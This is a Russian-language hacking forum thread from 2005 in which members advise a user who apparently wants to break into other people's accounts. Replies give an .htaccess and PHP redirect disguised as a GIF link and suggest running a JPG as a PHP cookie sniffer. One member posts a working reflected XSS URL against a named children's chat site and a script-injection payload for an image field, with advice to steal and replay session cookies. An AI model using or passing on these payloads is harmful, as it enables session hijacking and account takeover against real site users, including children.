JPG + php, java...

Discussion in 'PHP' started by PreVarioS, 10 Aug 2005.

  1. PreVarioS

    PreVarioS New Member

    Joined:
    8 Aug 2005
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    outing mouting
     
    #1 PreVarioS, 10 Aug 2005
    Last edited: 1 Oct 2005
  2. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Этот способ уже многие используют. А я все видео записать немогу. Времени нету. Это так называемый активный XSS, но с ориентиром на браузер и т.п. ограничения. Вообщем - не панацея.
    А так - можно. Тока под браузер Ie и только если это изображение будет открыто на прямую (в адресной строке - полный путь до изображения).
    Содержимое:
    Обычный html с редиректом (или можешь на JS) + <iframe> на всю ширину изображения где будет путь до нормального изображения.
     
    _________________________
    #2 censored!, 10 Aug 2005
    Last edited: 10 Aug 2005
  3. xPow

    xPow New Member

    Joined:
    23 Jun 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    censored!, сто процентов уверен, что в твоем ответе есть какой то смысл... но какой то он странный :)

    потом говоришь апачу, что надо обработать pic.jpg, как php скипт
    ну и юзаешь потом, как просто снифер ;-)
     
    #3 xPow, 10 Aug 2005
    Last edited: 10 Aug 2005
  4. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    а в чем его, ответа, странность? по-моему он это и имел в виду. только он хочет несколько другое:
    типа послать кому-нить картинку и при ее отображении (когда она вставлена в html) произошел редирект на его страницу (скорее всего фэйковую). Вот я и ответил - так не получиться, а получиться если тока откроют набрав полный путь в строке браузера.
    Просто он на форуме спрашивал как маил_ру ломануть, потом второй раз про изображения и ему похожий на твой ответ дали.

    А вообще - если бы он сразу написал что он конкретно хочет, мы бы тут не гадали и не предполагали чего и как.

    Как твой ответ правильный, так и мой.
     
    _________________________
  5. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    Если надо чтобы отсылало делаешь вот так:

    Вот это пишешь в .htaccess:


    RewriteEngine On
    RewriteBase /
    RewriteRule ^img.gif$ /img.php [L]

    Потом открываешь img.php и пишешь:

    <?
    header("Location: tvoy_URL");
    ?>


    ссылка на картинку - http://tvoy_sayt.ru/img.gif
     
  6. xPow

    xPow New Member

    Joined:
    23 Jun 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    censored!, я не сказал, что твой ответ не верный, я сказал, что он "странный" :)
    я просто посчитал, что он хочет данные отправить.

    Zadoxlik, а вот твой ответ неверный, правда, если картинка будет в теге <img>
     
  7. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    xPow, мой ответ - верный. Так или иначе переадрессация произойдет, просто если это будет в <img> пользователь этого не заметит.

    А вот твой - неверен, т.к. переадрессации там нет, апросили ее. А говорить апачу, чтобы воспринимал файлы с расширением jpg как PHP-интерпретируемые - дурной тон.
     
    #7 Zadoxlik, 10 Aug 2005
    Last edited: 10 Aug 2005
  8. xPow

    xPow New Member

    Joined:
    23 Jun 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    как ты видишь здесь не указано, что посылалО.
    если был бы юзер, то надо было
    согласись.

    а так выходит, что ему надо вэб-снифер.

    P.s. что касается дурного тона - то дурной тон, это отвечать на вопросы, которые еще не заданы.
    P.p.s. и если автору правильный ответ действительно нужен - пускай уточнит вопрос.
     
  9. xPow

    xPow New Member

    Joined:
    23 Jun 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    а что касается, неверности твоего ответа, то он в том, что картинка не выведется, если только...
    но об это только ты не обмовился и потому он не верный :)

    и вообще, что если на серваке НЕТ mod_rewrit'a?
    что если админ ЗАПРЕТИЛ изменять конфиги сервака юзерам?
     
    #9 xPow, 10 Aug 2005
    Last edited: 10 Aug 2005
  10. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    а давайте лучше дождемся автора? =)
     
    _________________________
  11. PreVarioS

    PreVarioS New Member

    Joined:
    8 Aug 2005
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    ffffffrak
     
    #11 PreVarioS, 10 Aug 2005
    Last edited: 1 Oct 2005
  12. PreVarioS

    PreVarioS New Member

    Joined:
    8 Aug 2005
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    Zadoxlik а ты мне скажи это делать на любом сервере подерживающий php???
     
    #12 PreVarioS, 10 Aug 2005
    Last edited: 10 Aug 2005
  13. xPow

    xPow New Member

    Joined:
    23 Jun 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0

    то, что ты хочешь, у тебя не выйдет.
    ну, правда, можешь айпи-шники юзвером смотреть ;-)
     
  14. PreVarioS

    PreVarioS New Member

    Joined:
    8 Aug 2005
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    У меня не выйдет??, А у других выходит, меня один так послали...просто быстренько присылается что то в привате и я на другом сайте...
     
  15. xPow

    xPow New Member

    Joined:
    23 Jun 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    http://vkids.km.ru/regards.asp?vozvrat="><script>alert('xPow');</script>&type=only_nick

    дальше будет. если будет необходимость ;-)

    P.S. только нах тебе надо этот детский чат?
     
  16. PreVarioS

    PreVarioS New Member

    Joined:
    8 Aug 2005
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    dddddddddddorememmmm g lol
     
    #16 PreVarioS, 10 Aug 2005
    Last edited: 1 Oct 2005
  17. xPow

    xPow New Member

    Joined:
    23 Jun 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    дальше все стандартно: воруешь кукисы и подменяешь их на свои, что должно дать тебе возможность зайти от имени того, кому они, кукисы, принадлежат
     
  18. PreVarioS

    PreVarioS New Member

    Joined:
    8 Aug 2005
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    vvvvaulya
     
    #18 PreVarioS, 10 Aug 2005
    Last edited: 1 Oct 2005
  19. xPow

    xPow New Member

    Joined:
    23 Jun 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    введи это в поле картинка:
    http://"><script>window.location="forum.anonymous.ru";</script>.gif

    P.S. у тебя есть время пока я не напишу админу + он не залатает ;-)
     
  20. PreVarioS

    PreVarioS New Member

    Joined:
    8 Aug 2005
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    pishi pishi
     
    #20 PreVarioS, 10 Aug 2005
    Last edited: 1 Oct 2005